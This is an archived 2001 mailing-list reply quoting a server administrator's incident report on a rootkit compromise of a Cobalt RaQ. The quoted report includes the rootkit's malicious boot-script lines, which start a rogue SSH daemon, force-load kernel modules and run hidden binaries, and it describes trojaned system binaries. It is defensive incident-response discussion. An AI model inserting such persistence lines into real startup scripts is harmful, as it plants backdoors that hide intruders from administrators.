[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] Recent Hacks (resolution in sight)
- Subject: Re: [cobalt-users] Recent Hacks (resolution in sight)
- From: John Shireley <jshirele@xxxxxxxxxxxxxxxxxxx>
- Date: Fri Feb 9 20:28:10 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Where exactly is this "unhack.pl" script located? I haven't seen it
mentioned previously, but may have missed it.
Regards,
- John
--------------------------------------------------------------
John Shireley, Operations Support Manager
CoreComm Web Hosting, formerly Voyager.net
Desk: 877.663.2748, ext. 105 Mobile: 317.710.7678
john.shireley @ voyager.net ICQ: 71529750
"Unbreakable toys are useful for breaking other toys."
On Fri, 9 Feb 2001, inc wrote:
>
> thanks to those who maintained email with me today; it's been a great help.
>
> here's my report:
>
>
> i've successfully (touch wood) used the unhack.pl script recommended by
> Steve Bassi via Mike Fritsch.
>
> after running unhack.pl, there's one file that unhack said was neither
> hacked (according to its internal MD5 checksums) nor "original" cobalt.
>
> this file, /etc/rc.d/init.d/network contains the following which i would say
> is part of the hack.
>
> /usr/bin/ssh2d -q
> if test -f "/dev/kmod"; then
> /sbin/insmod -f /usr/lib/crth.o
> /sbin/insmod -f /usr/lib/crtz.o
> fi
> if test -f /lib/security/.config/sn ; then
> cd /lib/security/.config;./lpsched
> fi
> touch /var/lock/subsys/network
> if test -f "/dev/dos"; then
> /usr/lib/lpq
> fi
> ;;
>
>
> i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
> note that unhack.pl DOESN'T clear up crtz.o. can anyone shed some light on
> the remaining commands there? i've disabled all these lines until i know
> what they are. my "network" script was considerably more complicated than
> the "network" script included with unhack.tar.gz
>
> i also spent the whole day studying up on cracking and studying the scripts
> and binaries that were placed on my raq.
>
> the only weird thing i could find in my logs was an ftp login from korea. i
> have not published any ftp site urls anywhere, and this is the only ftp
> login i've ever seen in the logs apart from my own, and the 127.0.0.1
> entries used by the admin. this ftp login occurred 4 hours before the
> rootkit was activated.
>
> so i would think that proftpd was exploited to gain root access.
>
> all log entries bar the ftp one above were cleaned up, but there were
> footsteps left behind in /.bash_history which reflected an rcp download from
> a us .edu site.
>
> at this point ps, su, all manner of executables are replaced to hide any
> unusual activity. flash22 suggested i try "top" -- which lo and behold
> turned up all my logins running as "/bin/xlogin" -- which appeared to be a
> copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
> have a crypted password in it. the replaced "/bin/login" was a very small
> file next to the original cobalt "/bin/login".
>
>
> i'm happy to answer any questions on this.
>
> thanks again to those who helped me climb out of the black hole!
>
>
> --
> chris paul
> fastmedia.net
>
>
>
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>